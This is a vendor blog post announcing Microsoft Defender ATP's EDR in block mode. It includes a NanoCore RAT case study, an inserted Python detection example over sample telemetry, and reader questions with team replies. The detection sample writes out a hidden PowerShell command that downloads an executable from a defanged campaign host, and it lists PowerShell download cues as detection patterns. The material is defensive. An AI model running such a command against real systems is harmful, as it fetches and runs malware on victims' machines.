Introducing EDR in block mode: Stopping attacks in their tracks

Published 08-18-2020 10:07 AM

Endpoint detection and response (EDR) in block mode is a new capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that turns EDR detections into blocking and containment of malicious behaviors. This capability uses Microsoft Defender ATP’s industry-leading visibility and detection capability to provide an additional layer of post-breach blocking of malicious behavior, malware, and other artifacts that your primary antivirus solution might miss.


Through built-in machine learning models in Microsoft Defender ATP, EDR in block mode extends behavioral blocking and containment, which uses machine learning-driven protection engines that specialize in detecting threats by analyzing behavior. The ability of this feature to detect and stop threats in real time, even after they have started running, empowers organizations to thwart cyberattacks, maintain security posture, and reduce the manual steps and time to respond to threats.


When EDR in block mode detects malicious behaviors or artifacts, it stops related running processes, blocking the attack from progressing. These blocks are reported in Microsoft Defender Security Center, where security teams can see details of the threat and remediation status, and use Microsoft Defender ATP’s rich set of capabilities to further investigate and hunt for similar threats as necessary.



Figure 1. Sample Microsoft Defender ATP alert on threat caught by EDR in block mode


EDR in block mode was developed in close collaboration with customers, and is in public preview starting today. We thank our customers for the partnership and for the invaluable feedback during the limited preview, during which the feature blocked multiple real-world attacks. In this blog, we’ll share details about one of these attacks.


EDR block mode in action


In April of this year, EDR in block mode protected against and blocked a NanoCore RAT attack that aimed to steal credentials, spy using a device’s camera, and pilfer other information. The attack started with a spear-phishing email carrying a malicious Excel attachment. The Excel file contained a malicious macro that, when enabled, ran PowerShell code that in turn downloaded and ran a file from hxxp://office-services-labs[.]com/Scan.exe.



Figure 2. Malicious Excel file used in NanoCore campaign


The organization’s non-Microsoft antivirus solution didn’t detect the Excel file or its behavior, but Microsoft Defender ATP did. EDR in block mode kicked in, stopping the download behavior and blocking the PowerShell code and Excel file. This was reported in the Microsoft Defender Security Center, alerting the security team about the blocked behavior. While the threat was automatically remediated, the alert empowers the security team to perform additional investigation and hunting for similar threats.



Figure 3. EDR in block mode alert in Microsoft Defender Security Center


Had the attack been allowed to continue, the downloaded file Scan.exe would have run the following PowerShell commands, which would have downloaded the payload, a NanoCore variant, from hxxp://paste[.]ee/r/Pym5k:



Figure 4. Malicious PowerShell commands used by NanoCore campaign


NanoCore is a family of remote access trojans (RATs) that gather information about the affected device and operating system. It is designed to steal credentials, spy through cameras, and carry out other malicious activities. With EDR in block mode, Microsoft Defender ATP protected against the damaging impact of a successful NanoCore infection.



Figure 5. NanoCore RAT attack chain
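As an added example that is not part of the original post, here is a toy Python detection for the chain the post describes (an Office application spawning PowerShell that downloads a file), run over constructed telemetry; the event layout, the download cues and the benign sample events are assumptions rather than Microsoft Defender ATP's own schema or detection logic.

```python
# Added example, not code from the original post: a toy detection over constructed
# process and network telemetry for the chain described above (Office app spawns
# PowerShell, which fetches a file). Field names are assumptions, not ATP's schema.
from typing import Dict, List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command-line fragments that commonly indicate a download in PowerShell.
DOWNLOAD_CUES = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient")

# A process event: (pid, parent image, image, command line).
ProcessEvent = Tuple[int, str, str, str]
# A network event: (pid, remote url).
NetworkEvent = Tuple[int, str]
# A finding: (pid, reason, remote url if one was seen).
Finding = Tuple[int, str, Optional[str]]


def detect_office_download_chain(procs: List[ProcessEvent],
                                 nets: List[NetworkEvent]) -> List[Finding]:
    """Flag shells spawned by Office apps that download or connect out."""
    url_by_pid: Dict[int, str] = {pid: url for pid, url in nets}
    findings: List[Finding] = []
    for pid, parent, image, cmdline in procs:
        if parent.lower() not in OFFICE_APPS or image.lower() not in SHELLS:
            continue  # ordinary parent/child pair, ignore
        cmd = cmdline.lower()
        cue = next((c for c in DOWNLOAD_CUES if c in cmd), None)
        url = url_by_pid.get(pid)
        if cue is None and url is None:
            continue  # Office spawned a shell, but nothing suggests a download
        why = f"{parent} spawned {image}"
        why += f" with '{cue}' in its command line" if cue else " which connected out"
        findings.append((pid, why, url))
    return findings


# Constructed sample telemetry modelled on the campaign above (URL defanged as in the post).
SAMPLE_PROCS: List[ProcessEvent] = [
    (4242, "EXCEL.EXE", "powershell.exe",
     "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
     "'hxxp://office-services-labs[.]com/Scan.exe', 'C:\\Users\\Public\\Scan.exe')"),
    (4300, "explorer.exe", "powershell.exe", "powershell Get-Date"),  # benign admin use
    (4301, "EXCEL.EXE", "splwow64.exe", "splwow64.exe 12288"),        # benign print helper
]
SAMPLE_NETS: List[NetworkEvent] = [(4242, "hxxp://office-services-labs[.]com/Scan.exe")]

if __name__ == "__main__":
    for pid, why, url in detect_office_download_chain(SAMPLE_PROCS, SAMPLE_NETS):
        print(f"pid {pid}: {why}; destination {url}")
```

Only the Excel-spawned PowerShell with a download cue and an outbound connection is reported; the explorer-launched shell and the Excel print helper are left alone.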


Turning on EDR in block mode


EDR in block mode is in public preview starting today, so if you have preview features turned on in Microsoft Defender Security Center, you can try it now. Once you’ve opted in, turning on EDR in block mode is simple. Go to Settings > Advanced features. Switch the toggle for “Enable EDR in block mode” to On.



Figure 6. Microsoft Defender Security Center Advanced features settings


Security teams are also informed about this feature via the security recommendation titled “Enable EDR in block mode” in threat and vulnerability management.


Figure 7. EDR in block mode in security recommendations


To learn more about the behavioral blocking and containment capabilities in Microsoft Defender ATP watch this SANS Webcast, refer to our documentation, and read this blog.


If you’re not yet taking advantage of Microsoft’s industry-leading security optics and detection capabilities for endpoints, sign up for a free trial of Microsoft Defender ATP today.


We welcome your feedback. If you have any comments or questions, let us know.



Jeong Mun and Shweta Jha

Microsoft Defender ATP team


Occasional Contributor

This. Is. Awesome!

Occasional Contributor

Hi all,

I would like to ask one question about this feature - what if you're utilizing ASR rules in a strict way - Block Mode and very few exclusions - wouldn’t Exploit Guard have stopped this particular behavior explained in your blog post upfront? Would there be a chance of getting conflicts between the two block modes? Thank you.


@Thomas Höhner - Thanks for posting your question, good one! At the moment you would need Microsoft Defender AV in Active mode to leverage ASR rules. The benefit of EDR in block mode is primarily focused (but not limited) on the situation where you are running some other AV as primary.

Occasional Contributor

Hi. Is there any way to enable it for a subset of endpoints? We would like to try it out on a device group before we enable it organization-wide (and this is required by change management). According to Endpoint detection and response in block mode - Windows security | Microsoft Docs, EDR Block Mode can only be enabled in Security Center - it would be great if we could configure it per group, like with automation levels.


@Shweta Jha So this is for organisations that don't have Windows Defender as their primary antivirus?

Occasional Contributor

@Shweta Jha 


Found this one in the MS docs -

It clearly states that Defender and cloud protection must/should be up and running...

I didn't have much to do with 3rd-party AVs in the last years, but we still have customers utilizing other AVs - so is it supported even without Defender AV or not?

Thank you for the clarification.



@PHancke Thanks for the feedback. Great suggestion, we will consider this while planning our roadmap. Will keep you posted.


@Peter_Kirk - Yes. You can turn on this feature to provide an additional layer of post-breach protection for devices that don't have Microsoft Defender AV as their primary AV. Please keep in mind that ideally we want our customers to be on the full MDATP stack (Defender AV as primary, plus EDR) to get the best protection, detection and response value. :)


@Thomas Höhner - when a 3rd-party AV is installed and the device is onboarded to MDATP, Microsoft Defender AV automatically moves into passive mode (not performing active prevention and blocking). Defender AV needs to remain in passive mode with CDP to use this feature.

Senior Member

Did EDR in block mode go GA yet?

New Contributor


How can one enable this for a large group of endpoints? In the docs it says:

"EDR in block mode can be turned on only in the Microsoft Defender Security Center. You cannot use registry keys, Intune, or group policies to enable or disable EDR in block mode."

Does this mean that each user must turn this on manually?

One user has the toggle for EDR block mode set to "ON", but the recommendation to turn it on is still present; any ideas as to what the reason may be?


@ozesati - not yet, but it will soon, stay tuned :)


@sintra3000 - the setting is switched on in the security center by the security admin. This switches it "on" for all endpoints that are part of your Microsoft Defender for Endpoint service. Endpoint detection and response in block mode - Windows security | Microsoft Docs.


On your point about it being "on" but still seeing the recommendation to turn it on, are you referring to the recommendation in the threat and vulnerability module?


@sintra3000 - you can enable the feature for your organization from the portal. Go to Settings --> Advanced features.

New Contributor

Hi, thank you.

Yes, in "Security recommendations" under "Threat & Vulnerability management". I turned it on a while ago, but I see a lot of endpoints still have it as a recommendation.


Established Member



Following the MS recommendation regarding Windows Servers 2016 and 2019 that use a third-party (non-MS) AV solution, we should consider uninstalling Defender AV to prevent problems, etc.


In such a case, having Windows Servers with Defender AV totally disabled (not in passive mode), deploying Microsoft Defender for Endpoint first and afterwards enabling EDR in Block Mode, will there be any additional layer of protection or not?


My question applies both to just installing "Microsoft Defender for Endpoint" on a Windows Server with Defender AV disabled and to afterwards "Enabling EDR in Block Mode".


My last question is, does the aforementioned case also affect MS Windows Server 2012, or only 2016 and 2019 (following MS official documentation, only 2016 and 2019 are mentioned)?


Thank you very much,


Occasional Contributor

Need some clarity on Passive vs Active - is Microsoft recommending that a native Defender AV be present and Active? Or do we recommend that EDR be run as primary?

Frequent Contributor

Microsoft states EDR support is available for Windows Server 2008 and Server 2012. But is it really EDR? Under the hood, the MMA agent is deployed on Server 2012, but all the MMA agent can do is push the logs over to Log Analytics. It cannot do any response actions. Come on Microsoft, be a bit honest and at least make your customers aware that EDR on older server versions is basically a read-only reporting tool with no teeth, and customers will still need to rely on other AV products to do anything.
